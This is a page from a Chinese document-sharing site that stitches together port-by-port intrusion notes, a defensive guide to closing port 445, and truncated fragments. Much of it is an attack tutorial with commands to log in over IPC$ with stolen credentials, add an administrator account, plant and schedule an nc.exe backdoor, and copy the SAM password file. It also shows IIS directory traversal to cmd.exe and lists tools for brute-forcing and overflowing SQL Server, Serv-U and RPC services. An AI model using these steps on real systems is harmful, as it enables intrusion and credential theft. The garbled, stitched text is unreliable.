搜档网
当前位置:搜档网 › 445端口入侵详解

445端口入侵详解

445端口入侵详解
445端口入侵详解

445 端口入侵详解 篇一:黑客常用入侵端口详解 常见的入侵端口: 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中 “0”是无效端口, 当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用 IP 地址为 0.0.0.0,设置 ACK 位并在以太网层广播。 (我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查 ip,如果有入侵赶 紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.) 端口:1 服务:tcpmux 说明:这显示有人在寻找 SGI Irix 机器。Irix 是实现 tcpmux 的主要提供者,默认情况下 tcpmux 在这种系统中被打开。Irix 机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。许多管理员在安装后忘记删除这些 帐户。因此 HACKER 在 INTERNET 上搜索 tcpmux 并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索 Fraggle 放大器时,发送到 X.X.X.0 和 X.X.X.255 的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP 版本将会在收到 UDP 包后回应含有垃圾字符 的包。TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER 利用 IP 欺骗可以发动 DoS 攻击。伪造两个 chargen 服务器之间的 UDP 包。同样 Fraggle DoS 攻击向目标地址的这个 端口广播一个带有伪造受害者 IP 的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明: FTP 服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开 anonymous 的 FTP 服务器的方法。 这些服务器带有可读写的目录。 木马 Doly Trojan、 Fore、 Invisible FTP、WebEx、WinCrash 和 Blade Runner 所开放的端口。 1 / 15

端口:22 服务:Ssh 说明:PcAnywhere 建立的 TCP 和这一端口的连接可能是为了寻找 ssh。这一服务有许多 弱点,如果配置成特定的模式,许多使用 RSAREF 库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录 UNIX 的服务。大多数情况下扫描这一端口是为 了找到机器运行的操作系统。 还有使用其他技术, 入侵者也会找到密码。 木马 Tiny Telnet Server 就开放这个端口。 端口:25 服务:SMTP 说明:SMTP 服务器所开放的端口,用于发送邮件。入侵者寻找 SMTP 服务器是为了传递 他们的 SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的 E-MAIL 服务器上,将简单的信 息传递到不同的地址。木马 Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、 WinPC、WinSpy 都开放这个端口。 端口:31 服务:MSG Authentication 说明:木马 Master Paradise、Hackers Paradise 开放此端口。 端口:42 服务:WINS Replication 说明:WINS 复制 端口:53 服务:Domain Name Server(DNS) 说明:DNS 服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗 DNS (UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。 端口:67 服务:Bootstrap Protocol Server 说明:通过 DSL 和 Cable modem 的防火墙常会看见大量发送到广播地址 255.255.255.255 的数据。这些机器在向 DHCP 服务器请求一个地址。HACKER 常进入它们,分配一个地址把自 己作为局部路由器而发起大量中间人 (man-in-middle) 攻击。 客户端向 68 端口广播请求配置, 服务器向 67 端口广播回应请求。 这种回应使用广播是因为客户端还不知道可以发送的 IP 地址。 2 / 15

端口:69 服务:Trival File Transfer 说明:许多服务器与 bootp 一起提供这项服务,便于从系统下载启动代码。但是它们常 常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 端口:79 服务:Finger Server 说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从 自己机器到其他机器 Finger 扫描。 端口:80 服务:HTTP 说明:用于网页浏览。木马 Executor 开放此端口。 端口:99 服务:metagram Relay 说明:后门程序 ncx99 开放此端口。 端口:102 服务:Message transfer agent(MTA)-X.400 over TCP/IP 说明:消息传输代理。 端口:109 服务:Post Office Protocol -Version3 说明:POP3 服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3 服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有 20 个,这意味着入 侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。 端口:110 服务:SUN 公司的 RPC 服务所有端口 说明:常见 RPC 服务有 rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd 等 端口:113 服务:Authentication Service 说明:这是一个许多计算机上运行的协议,用于鉴别 TCP 连接的用户。使用标准的这种 服务可以获得许多计算机的信息。 但是它可作为许多服务的记录器, 尤其是 FTP、 POP、 IMAP、 SMTP 和 IRC 等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口 的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与 E-MAIL 服务器的缓 慢连接。许多防火墙支持 TCP 连接的阻断过程中发回 RST。这将会停止缓慢的连接。 端口:119 3 / 15

服务:Network News Transfer Protocol 说明:NEWS 新闻组传输协议,承载 USENET 通信。这个端口的连接通常是人们在寻找 USENET 服务器。多数 ISP 限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组 服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送 SPAM。 端口:135 服务:Location Service 说明: Microsoft 在这个端口运行 DCE RPC end-point mapper 为它的 DCOM 服务。 这与 UNIX 111 端口的功能很相似。 使用 DCOM 和 RPC 的服务利用计算机上的 end-point mapper 注册它们 的位置。远端客户连接到计算机时,它们查找 end-point mapper 找到服务的位置。HACKER 扫 描计算机的这个端口是为了找到这个计算机上运行 Exchange Server 吗?什么版本?还有些 DOS 攻击直接针对这个端口。 端口:137、138、139 服务:NETBIOS Name Service 说明:其中 137、138 是 UDP 端口,当通过网上邻居传输文件时用这个端口。而 139 端 口:通过这个端口进入的连接试图获得 NetBIOS/SMB 服务。这个协议被用于 windows 文件和 打印机共享和 SAMBA。还有 WINS Regisrtation 也用它。 端口:143 服务:Interim Mail Access Protocol v2 说明:和 POP3 的安全问题一样,许多 IMAP 服务器存在有缓冲区溢出漏洞。记住:一种 LINUX 蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被 感染的用户。 当 REDHAT 在他们的 LINUX 发布版本中默认允许 IMAP 后, 这些漏洞变的很流行。 这一端口还被用于 IMAP2,但并不流行。 端口:161 服务:SNMP 说明:SNMP 允许远程管理设备。所有配置和运行信息的储存在数据库中,通过 SNMP 可获得这些信息。许多管理员的错误配置将被暴露在 Internet。Cackers 将试图使用默认的密码 public、private 访问系统。他们可能会试验所有可能的组合。SNMP 包可能会被错误的指向用 户的网络。 端口:177 服务:X Display Manager Control Protocol 说明:许多入侵者通过它访问 X-windows 操作台,它同时需要打开 6000 端口。 端口:389 服务:LDAP、ILS 4 / 15

说明:轻型目录访问协议和 NetMeeting Internet Locator Server 共用这一端口。 端口:443 服务:Https 说明:网页浏览端口,能提供加密和通过安全端口传输的另一种 HTTP。 端口:456 服务:[NULL] 说明:木马 HACKERS PARADISE 开放此端口。 端口:513 服务:Login,remote login 说明: 是从使用 cable modem 或 DSL 登陆到子网中的 UNIX 计算机发出的广播。 这些人为 入侵者进入他们的系统提供了信息。 端口:544 服务:[NULL] 说明:kerberos kshell 端口:548 服务:Macintosh,File Services(AFP/IP) 说明:Macintosh,文件服务。 端口:553 服务:CORBA IIOP (UDP) 说明:使用 cable modem、DSL 或 VLAN 将会看到这个端口的广播。CORBA 是一种面向对 象的 RPC 系统。入侵者可以利用这些信息进入系统。 端口:555 服务:DSF 说明:木马 PhAse1.0、Stealth Spy、IniKiller 开放此端口。 端口:568 服务:Membership DPA 说明:成员资格 DPA。 端口:569 服务:Membership MSN 说明:成员资格 MSN。 5 / 15

端口:635 服务:mountd 说明:Linux 的 mountd Bug。这是扫描的一个流行 BUG。大多数对这个端口的扫描是基 于 UDP 的,但是基于 TCP 的 mountd 有所增加(mountd 同时运行于两个端口)。记住 mountd 可运行于任何端口(到底是哪个端口,需要在端口 111 做 portmap 查询),只是 Linux 默认端 口是 635,就像 NFS 通常运行于 2049 端口。 端口:636 服务:LDAP 说明:SSL(Secure Sockets layer) 端口:666 服务:Doom Id Software 说明:木马 Attack FTP、Satanz Backdoor 开放此端口 端口:993 服务:IMAP 说明:SSL(Secure Sockets layer) 端口:1001、1011 服务:[NULL] 说明:木马 Silencer、WebEx 开放 1001 端口。木马 Doly Trojan 开放 1011 端口。 端口:1024 服务:Reserved 说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为 它们分配下一个闲置端口。基于这一点分配从端口 1024 开始。这就是说第一个向系统发出请 求的会分配到 1024 端口。你可以重启机器,打开 Telnet,再打开一个窗口运行 natstat -a 将会 篇二:445 端口 445 端口,一个既让人爱,又招人恨的端口,有了它,网民们可以在局域网中轻松访问 各种共享文件夹或共享打印机,但正因为有了它,Internet 上 的“恶人”们才有了“可乘之机”, 他们能躲在 Internet 上的“阴暗角落”里,偷偷共享你的硬盘,甚至会在悄无声息中,将你的硬 盘格式化掉!面对如此 猖獗、疯狂的攻击,你能做的,就是运用自己的智慧,与 Internet 上 的“大恶人”们,“决战”于 445 端口之巅!为了助你“敲”开胜利之门,本文特“ 传授”你如下决战 秘诀,仅供参考。 端口排除法 单击“开始” →“设置 ” →“ 网络和拨号连接 ” →“Internet 连接” ,选中“ 属性” 选项,弹出 Internet 连接属性窗口; 6 / 15

打开“常规”标签页面,选中“Internet 协议(TCP/IP)”,单击“属性”,再单击属性页面中的 “高级”按钮,打开高级 TCP/IP 设置窗 口,选中“选项”标签,并在该标签页面的“可选的设置” 项中,将“TCP/IP 筛选”选中,同时单击“属性”,打开设置窗口(如图 1); 图1 由于 445 端口属于一种 TCP 端口,你可以在对应“TCP 端口”的设置项处,将“只允许”项选 中,激活下面的“添加”按钮,单击该按钮,在其后打开的“ 添加筛选器”窗口中,将必须用到 的几个服务端口号码,都添加进来,而将用不到的 445 端口号码排除在外,设置完毕后,单击 “确定”按钮,就可以让设 置生效 了。 服务关闭法 考虑到文件夹或打印机共享服务,才会利用到 445 端口,因此直接将文件夹或打印机共 享服务停止掉,同样也能实现关闭 445 端口的目的: 按前面方法,打开“Internet 连接”属性窗口;在“常规”标签页面中,将“此连接使用下列选 定的组件”列表框中的“Microsoft 网络的文件或打印机共享”选项取消,再单击“确定”,重新启 动系统就可以了。 当然,你也可以利用本地安全设置中的“用户权利指派”功能,指定 Internet 上的任何用户都无权访问本地主机,从而实现间接关闭 445 端口的目的: 依次单击“开始” →“程序” →“管理工具” →“本地安全设置”选项, 展开“安全设置” →“本地策 略” →“用户权利指派”文件夹, 双击“拒绝从网络访问这台计算机” (如图 2) ; 继续单击“添加”, 选中“everyone”选项,再单击“添加”、“确定”, 这样任何一位外来访问者,都无法从网络访问 到本地主机了。不过该方法,“打击”范围比较广,造成的后果是无论是“敌人”,还是“良民”, 都无法访问到共享 资源了,因此这种方法,适宜在保存有绝对机密信息的服务器中使用。 图2 注册表设置法 这种方法,是通过修改注册表,将用于文件夹或打印机共享的服务禁止掉,具体操作方 法为: 依次展开注册表分支 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT \Parameters,在右边窗口中新创建“SMBDeviceEnabled”双字节值,再将其设置为“0”,然 后重新启动一下系统就 OK 了。 防火墙设置法 这种方法,是利用防火墙的安全过滤规则,将通过 445 端口的任何数据包拦截下来。比 方说,启动“KV3000 的反黑王防火墙”,单击“防火墙控制”处的“规则设置”按钮,再单击“增加 规则”,打开图 3 界面; 在该界面的名称设置项处,输入“关闭 445 端口”,在“网络条件”处,选中“接受数据包”, 并将对方 IP 地址设置为“任何地址”,将本地 IP 地址设置为“指定本地 IP 地址”,然后输入本地 主机的 IP 地址。 单击“TCP”标签,并在本地端口处,选中“指定端口”,并输入“445”;在“对方端口”处,选 7 / 15

中“任一端口”选项。 图3 在“规则对象”处,选中“系统访问网络时”,在“当所有条件满足时”处,选中“拦截”,最后 单击“确定”,完成安全过滤规则的创建。返回到反黑王防火墙 的规则设置窗口,选中刚刚创 建好的“关闭 445 端口”的过滤规则,如此一来,来自 445 端口的各种非法入侵,都会被反黑王 防火墙自动拦截。 组策略设置法 依次单击“开始”→“程序”→“管理工具”→“本地安全策略”, 打开一个本地组策略编辑界面, 右击“IP 安全策略,在本地机器”,执行“创建 IP 安全策略”命令,弹出一个创建向导界面; 单击“下一步”,在“名称”处,输入“关闭 445 端口”,再单击“下一步”,选中“激活默认响应 规则”,其余参数均设置为默认值,就可以完成新安全策略 的创建操作了;单击“添加”,继续 单击“下一步”,选中“此规则不指定隧道”,然后将“网络类型”设置为“所有网络连接”,接着选 中“Windows 2000 默认值??”选项,再单击“下一步”,在 IP 筛选器列表界面中单击“添加”,将 IP 筛选器名称设置为“阻止 445 端口”,单击“添加”,再将源地 址设置为“任何 IP 地址”,将目标 地址设置为“我的 IP 地址”,继续单击“下一步”,选中“TCP”; 在随后的窗口中,选中“从 任意端口到此端口”,并输入“445”,最后依次单击“完成”、“关 闭”,返回到 IP 筛选器列表页面;然后选中“阻止 445 端口”筛选器,单击“下一步 ”,选中“拒 绝”选项,再依次单击“下一步”、“完成”按钮,就能将“阻止 445 端口”的筛选器,添加到名为“关 闭 445 端口”的 IP 安全策略中了,再单 击“确定”按钮,返回到“本地安全设置”窗口中。 最后,在“本地安全设置”窗口中,右击“关闭 445 端口”策略,从弹出的快捷菜单中,依 次单击“所有任务”/“指派”命令,就能使上述设置生效了。 篇三:网络入侵命令详解 网络入侵命令详解 1:NET 只要你拥有某 IP 的用户名和密码,那就用 IPC$做连接吧! 这里我们假如你得到的用户是 hbx,密码是 123456。假设对方 IP 为 127.0.0.1 net use \\127.0.0.1\ipc$ 123456 /user:hbx null 密码为空 退出的命令是 net use \\127.0.0.1\ipc$ /删除 -------------------------------net share 是 查 看 主 机 共 享 资 源 我 们 用 它 建 一 个 秘 密 共 享 目 录 吧 net share me=c:\winnt\system32 这样这个机器就有了一个名为 me 的共享目录,而打开它就是 winnt 下 的 system32 目录,如果你用 win2000 的系统就知这个目录有多重要了,如果不想要也好办 net share me /删除 呵呵,没有了,是不是很方便的啊。 ---------------------- ---------------------- ---------------------下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- ---------------------- ---------------------下面我们讲怎么创建一个用户,由于 SA 的权限相当于系统的超级用户. 8 / 15

我们加一个 heibai 的用户密码为 lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入 Administrator 组了. net localgroup Administrators heibai /add ---------------------这里是讲映射对方的 C 盘,当然其他盘也可以,只要存在就行了.我们这里把对方的 C 盘 映射到本地的 Z 盘. net use z:\\127.0.0.1\c$ ---------------------net start telnet 这样可以打开对方的 TELNET 服务. ---------------------这里是将 Guest 用户激活, guest 是 NT 的默认用户, 而且无法删除呢?不知道是否这样, 我的 2000 就是删除不了它。 net user guest /active:yes ---------------------net user guest /active:no 这样这个 guest 的用户就又被禁用了 ---------------------这里是把一个用户的密码改掉, 我们把 guest 的密码改为 lovechina, 其他用户也可以的。 只要有权限就行了呀! net user guest lovechina 有人问到提高权限的问题 下面就解决下 net localgroup administrators guest /add 将 guest 变为 administrator net 命令果然强大啊! net view 命令看对方开了共享 ------------------------------------------------------------------------------------------------------------net user 是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让 他美, net user 用户名 /删除哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管 理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators 就列出管理员 组成员了,再查看一下 administrator 这个用户,因为这个是创建系统时建出来的,所以要看看 他的系统是什么时间创建出来的 net user administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远, 那可能是被别人偷偷跑来偷建的,一律 del,安全第一哦................ --------------------------------------------------------------------------------------------------------------------------2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动 他呢? 9 / 15

那么需要用 AT 命令,这里假设你已经登陆了那个服务器。 ---------------------你首先要得到对方的时间, net time \\127.0.0.1 ---------------------将会返回一个时间,这里假设时间为 12:1,现在需要新建一个作业,其 ID=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马,名为 NC.EXE,这个东西要在对方服务器上. 这里介绍一下 NC, NC 是 NETCAT 的简称, 为了方便输入, 一般会被改名.它是一个 TELNET 服务,端口为 99. 等到了 12:3 就可以连接到对方的 99 端口.这样就给对方种下了木马. ----------------------------------------------------at 命令功能强大,下面可以打个比方: C:\> AT 22:30 Start C:\prettyboy.mp3 新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在 22:30 分 系统将自动播 放歌曲] --------------------------------------------------------------------------------------------------------------------------3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方 种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的 99 端口.那你就可以在对方运行命令了,这个也就是肉鸡. --------------------------------------------------------------------------------------------------------------------------4:FTP 它可以将你的东西传到对方机子上, 你可以去申请个支持 FTP 上传的空间, 国内多的是, 如果真的找不到,我给 https://www.sodocs.net/doc/7111627801.html,,不错的.当我们申请完后,...?约癋 TP 服务器.在上传前 需要登陆先,这里我们假设 FTP 服务器 https://www.sodocs.net/doc/7111627801.html,,用户名是 HUCJS,密码是 654321 ftp 他会要求输入用户,成功后会要求输入密码. ---------------------下面先说上传,假设你需上传的文件是 INDEX.HTM ,它位于 C:\ 下,传到对方 D:\get c:\index.htm d:\ 假设你要把对方 C 盘下的 INDEX.HTM,下到你的机子的 D 盘下 put c:\index.htm d:\ -------------------------------------------------这里的问题是两个命令的解释正好弄反了,登陆FTP服务器后 get 才是下载,而 put 命令是上传, 这和 tftp 的命令正好相反, 在 tftp 命令里 get 是上传 put 是下载, 这下明白了吧, 而且在FTP服务器中不能用 c:\和 d:\这样来指明路径,这也是在 tftp 里面用的方法,FTP 可 10 / 15

不会执行的,不信你去试好了,正确应该这样上传文件 put index.htm 这样就足够了,装 c 盘 根目录下的 index.htm 文件上传到 FTP 服务器的当前目录下,不喜欢就 del index.htm 删掉这文 件,下载时先查看一下目录,dir 然后看这个目录里有什么,有你要的你就 get index.htm 这样 就把 index.htm 这个文件下载到你自己的 c 盘根目录下了。 -------------------------------------------------------------get index.htm c:\inetpub\wwwroot\index.htm (这里是把你空间上的 index.htm 下载到对方 的 c:\inetpub\wwwroot\index.htm)" 这句的解释里就没有出现错误,呵呵,看来那以前的还是马虎所至吧 好了,总算找出错处了吧,再说下面吧。 --------------------------------------------------------------------------------------------------------------------------5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好 IPC$连接才有效。 这里 我们把本地 C 盘下的 index.htm 复制到 127.0.0.1 的 C 盘下 copy index.htm \\127.0.0.1\c$\index.htm ---------------------如果你要复制到 D 盘下 把 C 改为 D, 就行了! copy index.htm \\127.0.0.1\d$\index.htm ---------------------如果你要把他复制到 WINNT 目录里 就要把输入 copy index.htm \\127.0.0.1\admin$\index.htm admin$是 winnt --------------------要把对方的文件复制过来,顺便告诉大家 NT 的备份的数据库放在 x:\winnt\repair\sam._ sam._是数据库的文件名 ---------------------- ---------------------下面就把 127.0.0.1 的数据库复制到本地 C 盘下 copy \\127.0.0.1\admin$\repair\sam._ c:\ 这个 sam._ 这明显是 NT 主机的口令档,如果是 win2000 机器的口令文件应该是 sam--------------------------------------------------------------------------------------------------------------------------6:set 如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的 80 端 口要开,不然你黑给谁看。这时需要用 SET 命令! 下面是我得到的结果!我来分析它,只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 11 / 15

HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的 IP,这里本来是显示我的 IP,被我删除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; DigExt)NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD
Windows
98;
PATH_TRANSLATED=E:\vlroot 主页放在的地址,只要你看到 PATH_TRANSLATED=的后面就 是主页的存放地址。这里是 E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 GenuineIntelPROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET Family 6 Model 3 Stepping 3 ,
SCRIPT_NAME=/脚本 s/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0 对方使用 IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能 用 这个方法才能 100%的找到主页的名称,当你 DIR 这个目录时,一定会看到很多文件,你 可以把所有文件在浏览器这样输入 XX.XX.XX.XX/文件名, 这样只要看到和 XX.XX.XX.XX 看到的也 面一模一样,那么这就是主页的名称了。 12 / 15

--------------------------------------------------------------------------------------------------------------------------7:nbtstat 如果你扫到一部 NT 的机子,他的 136 到 139 其中一个端口开了的话,就要用这个命令 得到用户了。顺便告诉大家这是 netbios,得到用户名后就可以猜猜密码了。例如比较简单的 密码,密码和用户名一样的,都试下,不行就暴力破解吧! 现在网上很多 NT 的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。命 令是 nbtstat -A XX.XX.XX.XX -A 一定要大写哦。 这个我认为大不大写没有太大差别,用处还是一样的。 之后用 net use \\对方 IP 连接一下! net view \\对方 IP 查看对方共享文件夹 net use X: \\IP\对方共享文件 映射对方共享文件夹成为本机的 X 盘 这就是 139 端口的基本用法!不过前提是必须对方开共享! netstat -n 看看谁连接你 ----------------下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII UNIQUE PENTIUMII UNIQUE ORAHOTOWN GROUP ORAHOTOWN GROUP ORAHOTOWN UNIQUE PENTIUMII UNIQUE INet~Services GROUP IS~PENTIUMII... UNIQUE ORAHOTOWN GROUP ORAHOTOWN UNIQUE ..__MSBROWSE__. GROUP 粉红色的就是登陆过这部系统的用户, 可能你不知道怎么看, 大家是不是看到了一窜数字, 只要这窜数字是 的话,那他前面的就是用户. 这里的用户是 PENTIUMII。没有 03 说明:MAC 没和 IP 捆在一起了 ---------------------------------------------------------------------------------------------------------------------13 / 15

14 / 15

15 / 15

常用端口号大全

常用端口号大全(详细) [ 2007-7-23 22:42:00 | By: 梦精灵] ?21/tcp FTP 文件传输协议 ?22/tcp SSH 安全登录、文件传送(SCP)和端口重定向 ?23/tcp Telnet 不安全的文本传送 ?25/tcp SMTP Simple Mail Transfer Protocol (E-mail) ?69/udp TFTP Trivial File Transfer Protocol ?79/tcp finger Finger ?80/tcp HTTP 超文本传送协议(WWW) ?88/tcp Kerberos Authenticating agent ?110/tcp POP3 Post Office Protocol (E-mail) ?113/tcp ident old identification server system ?119/tcp NNTP used for usenet newsgroups ?220/tcp IMAP3 ?443/tcp HTTPS used for securely transferring web pages 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在I NTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HAC KER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。

黑客必会的网络端口的基本常识

黑客必会的网络端口的基本常识 大家好我是冰峰,今天来讲讲很多人都在问我的这个网络端口的问题。有过一些黑客攻击方面知识的读者都会知道,其实那些所谓的黑客并不是像人们想象那样从天而降,而是实实在在从您的电脑'大门'中自由出入。电脑的'大门'就-是我们平常所说的'端口',它包括电脑的物理端口,如电脑的串口、并口、输入/输出设备以及适配器接口等(这些端口都是可见的),但更多的是不可见的软件端-口,在本文中所介绍的都是指'软件端口',但为了说明方便,仍统称为'端口'。本文仅就端口的基础知识进行介绍,一、端口简介随着电脑网络技术的发展,原来物理上的接口(如键盘、鼠标、网卡、显示卡等输入/输出接口)已不能满足网络通信的要求,TCP/IP 协议作为网络通信的标准协-议就解决了这个通信难题。 TCP/IP协议集成到操作系统的内核中,这就相当于在操作 系统中引入了一种新的输入/输出接口技术,因为在TCP/IP 协议中引入了-一种称之为'Socket(套接字)'应用程序接口。有了这样一种接口技术,一台电脑就可以通过软件的方式与任何一台具有Socket接口的电脑进行通信。-端口在电脑编程上也就是'Socket接口'。有了这些端口后,这些端口又是 如何工作呢?例如一台服务器为什么可以同时是Web服务器,也可以是FTP服务器,还可以是邮件服务器等等呢?其

中一个很重要的原-因是各种服务采用不同的端口分别提供不同的服务,比如:通常TCP/IP协议规定Web采用80号端口,FTP采用21号端口等,而邮件服务器是采用25号端口-。这样,通过不同端口,电脑就可以与外界进行互不干扰的通信。据专家们分析,服务器端口数最大可以有65535个,但是实际上常用的端口才几十个,由此可以看出未定义的端口相当多。这是那么多黑客程序都可以采用某种方法,-定义出一个特殊的端口来达到入侵的目的的原因所在。为了定义出这个端口,就要依靠某种程序在电脑启动之前自动加载到内存,强行控制电脑打开那个特殊的端口。-这个程序就是'后门'程序,这些后门程序就是常说的木马程序。简单的说,这些木马程序在入侵前是先通过某种手段在一台个人电脑 中植入一个程序,打开某个(些)-特定的端口,俗称'后门'(BackDoor),使这台电脑变成一台开放性极高(用户拥有极高权限)的FTP服务器,然后从后门就可以达到侵入的目的。二、端口的分类端口的分类根据其参考对象不同有不同划分方法,如果从端口的性质来分,通常可以分为以下三类:(1)公认端口(Well KnownPorts):这类端口也常称之为'常用端口'。这类端口的端口号从0到1024,它们紧密绑定于一些特定的服务。通常这些端口的通信明确表明了某种服务的协议-,这种端口是不可再重新定义它的作用对象。例如:80端口实际上总是HTTP通信所使用的,而23号端口则是

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

====================================== 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

[黑客必学] 最基本的入侵步骤——送给新手

